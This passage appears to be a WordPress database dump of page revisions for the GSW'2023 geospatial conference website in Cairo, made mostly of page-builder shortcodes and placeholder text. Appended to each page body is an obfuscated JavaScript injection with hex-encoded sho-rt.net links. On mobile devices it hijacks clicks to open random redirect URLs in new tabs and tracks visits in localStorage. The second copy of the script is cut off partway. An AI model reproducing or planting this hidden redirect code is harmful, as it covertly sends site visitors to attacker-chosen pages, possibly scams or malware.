strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"pattern\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:15:09','2022-11-09 15:15:09','',3066,'https://gsw2023.com/?p=3134',0,'revision','',0),
(3135,1,'2022-11-09 15:16:17','2022-11-09 15:16:17','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"contain\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 